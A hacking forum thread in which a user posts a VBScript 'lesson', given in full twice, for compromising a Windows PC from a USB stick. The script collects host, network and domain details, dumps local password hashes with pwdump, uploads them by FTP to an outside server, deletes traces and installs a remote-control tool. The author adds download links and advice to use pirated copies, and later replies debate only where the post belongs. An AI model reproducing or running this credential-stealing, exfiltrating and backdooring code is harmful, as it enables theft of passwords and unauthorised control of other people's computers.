| Author |
get all info of a windows pc in less than 1 second! and even make it that you can remote controllabl |
jelmer
Banned
Posts: 89
Location: ҉planet earth ҉
Joined: 29.06.08
Rank: God
Warn Level: 100
|
|
|
Hello and welcome to my windows lesson, ill explain how i dump some very nice information to a ftp server.
This program will be completely autorunnable and flexible with any platform of windows.
For this tutorial i use vbs, ms-dos and ftp.
I am new to vbs so please correct me if i make terrible mistakes in my scblockedripting :).
DIM fso, TXT
Set fso = CreateObject("scblockedripting.FileSystemObject")
Set TXT = fso.CreateTextFile("hostinfo.txt", True)
i make a new text file named hostinfo.txt in the current folder.
strComputer = "."
set dicProductType = CreateObject("scblockedripting.Dictionary")
dicProductType.Add 1, "Workstation"
dicProductType.Add 2, "Domain Controller"
dicProductType.Add 3, "Standalone Server"
set objWMIDateTime = CreateObject("Wbemscblockedripting.SWbemDateTime")
set objWMI = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
set colOS = objWMI.InstancesOf("Win32_OperatingSystem")
for each objOS in colOS
TXT.WriteLine("Host Name: " & objOS.CSName)
TXT.WriteLine("OS Name: " & objOS.Caption)
next
set colCS = objWMI.InstancesOf("Win32_ComputerSystem")
for each objCS in colCS
TXT.WriteLine("Sys. Manufacturer: " & objCS.Manufacturer)
TXT.WriteLine("Sys. Model: " & objCS.Model)
TXT.WriteLine("Domain: " & objCS.Domain)
next
set colBIOS = objWMI.InstancesOf("Win32_BIOS")
for each objBIOS in colBIOS
TXT.WriteLine("BIOS Version: " & objBIOS.Version)
next
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colItems = objWMIService.ExecQuery _
("Select * From Win32_NetworkAdapterConfiguration Where IPEnabled = True")
for each objitem in colitems
strIPAddress = Join(objitem.IPAddress, ",")
IP = stripaddress
TXT.WriteLine("Ip adress: " &ip)
next
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set colItems = objWMIService.ExecQuery _
("Select * From Win32_NetworkAdapterConfiguration Where IPEnabled = True")
For Each objItem in colItems
TXT.WriteLine("Mac-adress: " & objItem.MACAddress)
Next
I save ALOT of information in the file that can be really really usefull if i want to hack it.
TXT.Write ("__________________________________________________________________________________")
nice line to keep it neat :D
set PWDUMP = fso.CreateTextFile("hash.bat", true)
PWDUMP.Write ("pwdump -o ./hash.txt 127.0.0.1")
PWDUMP.Close
I use PWDUMP to dump the password hashs from the local machine temporary on my usb stick. Note: PWDUMP should be in the same folder as your vbs scblockedript to let this part work.
pwdump(start pwdump) -o(outputfile) ./hash.txt 127.0.0.1(this machine)
i made a bat file of it to simply add the arguments.
I will run the bat later in the scblockedript.
set connect = fso.CreateTextFile("connect.bat", true)
connect.WriteLine("@echo off")
connect.WriteLine("del ftpcmd.dat")
connect.WriteLine("echo @echo off>> ftpcmd.dat")
connect.WriteLine("echo user username>> ftpcmd.dat")
connect.WriteLine("echo password of the username>> ftpcmd.dat")
connect.WriteLine("echo cd httpdocs>> ftpcmd.dat")
connect.WriteLine("echo cd upload-vbs>> ftpcmd.dat")
connect.WriteLine("echo send hostinfo.txt>> ftpcmd.dat")
connect.WriteLine("echo rename hostinfo.txt>> ftpcmd.dat")
connect.WriteLine("echo 1.txt>> ftpcmd.dat")
connect.WriteLine("echo send hash.txt>> ftpcmd.dat")
connect.WriteLine("echo rename hash.txt>> ftpcmd.dat")
connect.WriteLine("echo 2.txt>> ftpcmd.dat")
connect.WriteLine("echo quit>> ftpcmd.dat")
connect.WriteLine("ftp -n -s:ftpcmd.dat justanotherhost.xxx")
connect.WriteLine("del ftpcmd.dat")
connect.WriteLine("del hash.txt")
connect.WriteLine("del hostinfo.txt")
connect.WriteLine("del hash.bat")
connect.WriteLine("lololol.bat")
connect.Close
TXT.Close
dim shell
set shell=createobject("wscblockedript.shell")
shell.run "hash.bat"
set shell=createobject("wscblockedript.shell")
shell.run "connect.bat"
set shell=nothing
set omghah = fso.CreateTextFile("lololol.bat", true)
omghah.Write ("del connect.bat")
omghah.Close
set shell=createobject("wscblockedript.shell")
shell.run "servemp_quicksetup.exe"
set shell=nothing
I here made it make a ftp connection through a .bat file, uploaded it to the server and renamed the files to 1.txt and 2.txt.
I also deleted the files and somehow i couldnt figure out how to delete something inside itself and it kept on giving error's if i deleted it through the vbs scblockedript (help will be appreciated if you think you got a nice way to do this.)
Then i used the tool hc, Hidden Camera is the full name of it (servemp_quicksetup.exe) to make it remote controllable then the only action you have to do is bash the unblock button about 2 times and youre done.
You can totally remote controll the computer and you got all the information needed to successfully hack it.
downloads:
http://www.download3k.com/DownloadLink1-Hidden-Camera.html
the servemp_quicksetup.exe is in the add on rar file.
http://swamp.foofus.net/fizzgig/pwdump/pwdump6-1.7.2-exe-only.zip
i will now just make a version of how i got it on my usb stick:
pwdump
lsremora64.dll
lsremora.dll
PwDump.exe
servpw64.exe
servpw.exe
the vbs scblockedript:
uberscblockedript!.vbs
hidden camera
servemp_quicksetup.exe
here i will post the code only of the vbs scblockedript:
uberscblockedript!.vbs
DIM fso, TXT
Set fso = CreateObject("scblockedripting.FileSystemObject")
Set TXT = fso.CreateTextFile("hostinfo.txt", True)
strComputer = "."
set dicProductType = CreateObject("scblockedripting.Dictionary")
dicProductType.Add 1, "Workstation"
dicProductType.Add 2, "Domain Controller"
dicProductType.Add 3, "Standalone Server"
set objWMIDateTime = CreateObject("Wbemscblockedripting.SWbemDateTime")
set objWMI = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
set colOS = objWMI.InstancesOf("Win32_OperatingSystem")
for each objOS in colOS
TXT.WriteLine("Host Name: " & objOS.CSName)
TXT.WriteLine("OS Name: " & objOS.Caption)
next
set colCS = objWMI.InstancesOf("Win32_ComputerSystem")
for each objCS in colCS
TXT.WriteLine("Sys. Manufacturer: " & objCS.Manufacturer)
TXT.WriteLine("Sys. Model: " & objCS.Model)
TXT.WriteLine("Domain: " & objCS.Domain)
next
set colBIOS = objWMI.InstancesOf("Win32_BIOS")
for each objBIOS in colBIOS
TXT.WriteLine("BIOS Version: " & objBIOS.Version)
next
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colItems = objWMIService.ExecQuery _
("Select * From Win32_NetworkAdapterConfiguration Where IPEnabled = True")
for each objitem in colitems
strIPAddress = Join(objitem.IPAddress, ",")
IP = stripaddress
TXT.WriteLine("Ip adress: " &ip)
next
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set colItems = objWMIService.ExecQuery _
("Select * From Win32_NetworkAdapterConfiguration Where IPEnabled = True")
For Each objItem in colItems
TXT.WriteLine("Mac-adress: " & objItem.MACAddress)
Next
TXT.Write ("__________________________________________________________________________________")
set PWDUMP = fso.CreateTextFile("hash.bat", true)
PWDUMP.Write ("pwdump -o ./hash.txt 127.0.0.1")
PWDUMP.Close
set connect = fso.CreateTextFile("connect.bat", true)
connect.WriteLine("@echo off")
connect.WriteLine("del ftpcmd.dat")
connect.WriteLine("echo @echo off>> ftpcmd.dat")
connect.WriteLine("echo user /*username of your ftp server*/>> ftpcmd.dat")
connect.WriteLine("echo /*password of your ftp server*/>> ftpcmd.dat")
connect.WriteLine("echo cd httpdocs>> ftpcmd.dat")
connect.WriteLine("echo cd upload-vbs>> ftpcmd.dat")
connect.WriteLine("echo send hostinfo.txt>> ftpcmd.dat")
connect.WriteLine("echo rename hostinfo.txt>> ftpcmd.dat")
connect.WriteLine("echo 1.txt>> ftpcmd.dat")
connect.WriteLine("echo send hash.txt>> ftpcmd.dat")
connect.WriteLine("echo rename hash.txt>> ftpcmd.dat")
connect.WriteLine("echo 2.txt>> ftpcmd.dat")
connect.WriteLine("echo quit>> ftpcmd.dat")
connect.WriteLine("ftp -n -s:ftpcmd.dat /*the ftp server you want to use, you dont have to mention ftp:// just type something like anyhost.com/*")
connect.WriteLine("del ftpcmd.dat")
connect.WriteLine("del hash.txt")
connect.WriteLine("del hostinfo.txt")
connect.WriteLine("del hash.bat")
connect.WriteLine("lololol.bat")
connect.Close
TXT.Close
dim shell
set shell=createobject("wscblockedript.shell")
shell.run "hash.bat"
set shell=createobject("wscblockedript.shell")
shell.run "connect.bat"
set shell=nothing
set omghah = fso.CreateTextFile("lololol.bat", true)
omghah.Write ("del connect.bat")
omghah.Close
set shell=createobject("wscblockedript.shell")
shell.run "servemp_quicksetup.exe"
set shell=nothing
you only have to change the username of the ftp, also password and the server should be mentioned!
Rate and comment please if you liked it and tell me if i have to post more details if you dont understand it.
looking for someone with neat photoshop skills to help me with the design of http://root.cd
cat /dev/sda | aplay -fdat
 |
  
|
| Author |
RE: qwerty |
jelmer
Banned
Posts: 89
Location: ҉planet earth ҉
Joined: 29.06.08
Rank: God
Warn Level: 100
|
|
forgot to say that you have to click manager during the hidden camera setup, otherwise it will only make a backdoor in your pc so that someone else can come in.
And get a pirated version if you hate to use trials 
looking for someone with neat photoshop skills to help me with the design of http://root.cd
cat /dev/sda | aplay -fdat
|
|
|
| Author |
RE: get all info of a windows pc in less than 1 second! and even make it that you can remote control |
spyware
Member
Posts: 3798
Location: The Netherlands
Joined: 14.04.07
Rank: God
Warn Level: 50
|
|
HBH doesn't encourage posting tutorials in the forum section. Please submit this as official article.
"The chowner of property." - Zeph
Widespread intellectual and moral docility may be convenient for leaders in the short term,
but it is suicidal for nations in the long term. - Carl Sagan
|
|
| Author |
RE: get all info of a windows pc in less than 1 second! and even make it that you can remote control |
lostpacket
Member
Posts: 47
Location:
Joined: 12.12.06
Rank: Hacker Level 1 |
|
Then why is there a lessons section if you can't post lessons here?
Takes the piss a little really.
And to OP Compile your code and suchlikes gather the files and add it all to a rar file. Upload it.
People are more likely to test it out and tell you any errors and suchlikes if they don't have to scramble around the net looking for files.
 |
|
|
| Author |
RE: get all info of a windows pc in less than 1 second! and even make it that you can remote control |
spyware
Member
Posts: 3798
Location: The Netherlands
Joined: 14.04.07
Rank: God
Warn Level: 50
|
|
|
lostpacket wrote:
Then why is there a lessons section if you can't post lessons here?
I think the lesson section is meant for small things. The amount of code posted above could've fit better in the code-bank/article section.
However, I understand that it's a hard distinction to make for people, I guess HBH isn't really clear on this point. I still opt for an article version of the stuff posted above.
"The chowner of property." - Zeph
Widespread intellectual and moral docility may be convenient for leaders in the short term,
but it is suicidal for nations in the long term. - Carl Sagan
|
|
|
| Author |
RE: get all info of a windows pc in less than 1 second! and even make it that you can remote control |
lostpacket
Member
Posts: 47
Location:
Joined: 12.12.06
Rank: Hacker Level 1 |
|
Makes sense.
Code banks would be the best idea.
|
|
|
| Author |
RE: get all info of a windows pc in less than 1 second! and even make it that you can remote control |
jelmer
Banned
Posts: 89
Location: ҉planet earth ҉
Joined: 29.06.08
Rank: God
Warn Level: 100
|
|
lostpacket wrote:
Then why is there a lessons section if you can't post lessons here?
good point if you ask me , why dont post lesson's here the corner is there already
lostpacket wrote:
And to OP Compile your code and suchlikes gather the files and add it all to a rar file. Upload it.
didnt thought this would be a good idea because of the passwords are mentioned in the file and this way you also have to build it yourself, thought that it's a nice side about the lesson  
spyware wrote:
I think the lesson section is meant for small things. The amount of code posted above could've fit better in the code-bank/article section.
Yea but i still think this is a good way to work people through the process of self compiling, its not hard or something but its 1 step to evade scblockedript kiddey behaviour or atleast teach em a lesson i think.
I would really not put in a rar file or something, just ask me if you cant understand it anymore
looking for someone with neat photoshop skills to help me with the design of http://root.cd
cat /dev/sda | aplay -fdat
|
|
|
| Author |
RE: get all info of a windows pc in less than 1 second! and even make it that you can remote control |
Zephyr_Pure
Member
Posts: 2402
Location:
Joined: 15.09.06
Rank: God |
|
|
lostpacket wrote:
Code banks would be the best idea.
Not necessarily... the amount of explanation accompanying the code would make it acceptable as an article, too. It's preference, but I think an article would get better and more long-lived exposure.
jelmer wrote:
good point if you ask me , why dont post lesson's here the corner is there already
As spy said, the lessons section is for posting shorter lessons. If you have enough content for an article, post an article.
Either way, thanks for posting the content... It's just the placement that's in question.
I still check PMs from time to time.
Our responses were moronic, why shouldn't he follow suit? - Futility |
|
|
Main:
